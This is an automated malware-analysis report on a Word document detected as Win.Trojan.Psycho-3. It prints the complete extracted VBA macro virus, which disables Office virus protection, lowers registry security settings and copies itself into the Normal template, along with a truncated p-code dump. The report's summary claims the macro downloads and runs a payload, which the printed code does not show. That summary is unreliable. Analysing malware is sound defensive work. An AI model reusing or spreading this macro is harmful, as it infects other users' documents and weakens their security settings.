MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro attempts to disable security settings and download a temporary file to the system's TEMP directory. The macro also modifies registry keys related to Office security and attempts to execute a downloaded payload, indicating a downloader or dropper functionality.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5552 bytes |
SHA-256: 9105db495f750f0da90f85af594a5f7c0977c992182c5c059784793ac3f6ef24 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
γ = Environ("WINDIR") & ".\TEMP\"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP": Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65)): Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�
' Processing file: /opt/analyzer/scan_staging/cffa595df4794524bb61721372238d9e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3194 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' FuncDefn (Private Sub Document_Close())
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitDI2 0x0000
' Paren
' Ld Options
' MemSt VirusProtection
' Line #4:
' LitDI2 0x0000
' Paren
' Ld Options
' MemSt SaveNormalPrompt
' Line #5:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt DisplayAlerts
' Line #6:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt ScreenUpdating
' Line #7:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt EnableCancelKey
' Line #8:
' LitStr 0x0006 "WINDIR"
' ArgsLd Environ 0x0001
' LitStr 0x0007 ".\TEMP\"
' Concat
' St γ
' Line #9:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #10:
' Ld γ
' LitStr 0x0000 ""
' LitStr 0x000F "DefaultFileName"
' Ld System
' ArgsMemLd ProfileString 0x0002
' Concat
' ArgsLd FileLen 0x0001
' LitDI2 0x0000
' Eq
' DoWhile
' Line #11:
' ArgsCall Read 0x0000
' BoS 0x0000
' LitStr 0x000C "~WR00000.TMP"
' St α
' BoS 0x0000
' LitDI2 0x001A
' Ld Rnd
' Mul
' Paren
' LitDI2 0x0041
' Add
' FnInt
' ArgsLd Chr 0x0001
' Ld α
' LitDI2 0x0004
' LitDI2 0x0001
' Mid
' BoS 0x0000
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' Ld α
' LitDI2 0x0008
' LitDI2 0x0001
' Mid
' Line #12:
' Ld γ
' Ld α
' Concat
' Paren
' LitDI2 0x0001
' Ld VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #13:
' Ld γ
' Ld α
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #14:
' StartForVariable
' Ld η
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' BoS 0x0000
' LitDI2 0x0001
' Ld �
' LineInput
' BoS 0x0000
' StartForVariable
' Next
' BoS 0x0000
' LitStr 0x0000 ""
' St η
' Line #15:
' Ld ι
' LitStr 0x0002 "'�"
' Eq
' DoUnitil
' Line #16:
' LitDI2 0x0001
' Ld ι
' LineInput
' Line #17:
' Ld η
' Ld ι
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Concat
' St η
' Line #18:
' Loop
' BoS 0x0000
' LitDI2 0x0001
' Shar
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.